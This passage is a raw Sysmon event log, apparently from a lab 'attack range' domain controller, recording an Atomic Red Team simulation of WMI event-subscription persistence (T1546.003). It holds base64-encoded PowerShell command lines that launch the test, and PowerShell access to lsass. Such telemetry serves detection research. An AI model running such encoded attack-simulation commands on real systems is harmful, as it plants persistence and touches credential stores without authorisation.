C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004419Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004418Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-85A0-5FCF-DA00-000000009101}4116860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+270222|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26fe9f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f9ee|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26f97a|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+26e48b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c242b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+7c18d9|UNKNOWN(00007FF818FA5C40)|UNKNOWN(00007FF818FA5C40)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b37347(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b13120(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b12df1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+665c46d6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65ad3987(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b31e56(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b154bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\f2e75c3c5abfc2c2cdb9a82b4cd032d5\System.Management.Automation.ni.dll+65b1534c(wow64) 154100x80000000000000004417Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.050{10ACEC4A-85A1-5FCF-DD00-000000009101}2796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.7.2053.0 built by: NET47REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\vdfrlhva\vdfrlhva.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-859F-5FCF-CB41-080000000000}0x841cb0HighMD5=4360A98D8785625667D2574D2DD5C988,SHA256=F7DB25AA420C14C514690C1E943EC1E729596973E911B3445DFAD42FE958711D,IMPHASH=ED2AE001A3FDD84BDC04C99A98883A52{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEcAZQB0AFAAcgBlAHIAZQBxAHMA 11241100x80000000000000004416Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:41.036{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\vdfrlhva\vdfrlhva.cmdline2020-12-08 13:54:41.036 11241100x80000000000000004415Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:41.036{10ACEC4A-85A0-5FCF-DA00-000000009101}4116C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\vdfrlhva\vdfrlhva.dll2020-12-08 13:54:41.036 10341000x80000000000000004586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.878{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.878{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000004584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.831{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1gbhorg3.wzd.ps12020-12-08 13:54:42.831 10341000x80000000000000004583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.815{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-85A1-5FCF-E000-000000009101}33242792C:\Windows\system32\conhost.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004578Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004577Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004576Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004575Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004574Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004573Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004572Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004571Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.800{10ACEC4A-85A1-5FCF-E300-000000009101}22283320C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|UNKNOWN(00007FF8190092E0) 154100x80000000000000004570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.802{10ACEC4A-85A2-5FCF-E700-000000009101}2560C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"powershell.exe" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQA1ADQANgAuADAAMAAzACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMAZQAgAC0AVABpAG0AZQBvAHUAdABTAGUAYwBvAG4AZABzACAAMwAwADAAIAAtAEUAeABlAGMAdQB0AGkAbwBuAEwAbwBnAFAAYQB0AGgAIABDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAYQB0AGMAXwBlAHgAZQBjAHUAdABpAG8AbgAuAGMAcwB2AA==C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-85A1-5FCF-2492-080000000000}0x892240HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-85A1-5FCF-E300-000000009101}2228C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAaQBmACAAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuACAALQBsAHQAIABbAFYAZQByAHMAaQBvAG4AXQAiADMALgAwACIAKQAgAHsACgAnAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnAAoAZQB4AGkAdAAgADEACgB9AAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000004569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:42.597{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\